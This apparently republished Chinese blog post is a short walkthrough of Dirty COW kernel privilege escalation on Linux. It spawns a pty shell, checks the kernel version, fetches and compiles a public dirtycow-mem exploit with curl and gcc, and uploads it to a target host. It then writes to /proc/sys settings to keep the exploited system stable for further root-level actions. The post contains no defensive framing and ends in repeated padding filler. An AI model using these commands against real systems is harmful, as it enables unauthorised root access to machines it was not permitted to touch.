脏牛提权复现(脏牛提权原理)

基本概述

有时候我们在使用脏牛提权后会出现权限不稳定容易掉的情况,本篇文章主要提供一种解决方法

操作流程

获取shell之后为了便于操作我们这里更改交互式shell为pty类型:

python3 -c \\\"import pty;pty.spawn(\\\'/bin/bash\\\')\\\"

从上面可以看到这里并非root用户,所以我们下一步需要进行一次权限提升,之后查看内核版本——4.4.0-21-generic

uname -a

脏牛提权复现(脏牛提权原理)

发现在影响范围内,所以之后我们使用脏牛进行提权:

curl https://raw.githubusercontent.com/sqlnetcat/dirtycow-mem/master/dirtycow-mem.c > test.c gcc -Wall -o test test.c -ldl -lpthread

脏牛提权复现(脏牛提权原理)

之后上传编译好的文件到目标主机:
脏牛提权复现(脏牛提权原理)
之后执行载荷,进行权限提升:

之后保持利用稳定

echo 0 > /proc/sys/vm/dirty_writeback_centisecsecho 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn

之后就可以平稳的进行你的后续高权限操作了~

凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34139.html

Like (0)
七芒星实验室的头像七芒星实验室
Previous 2024年4月18日
Next 2024年4月18日

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注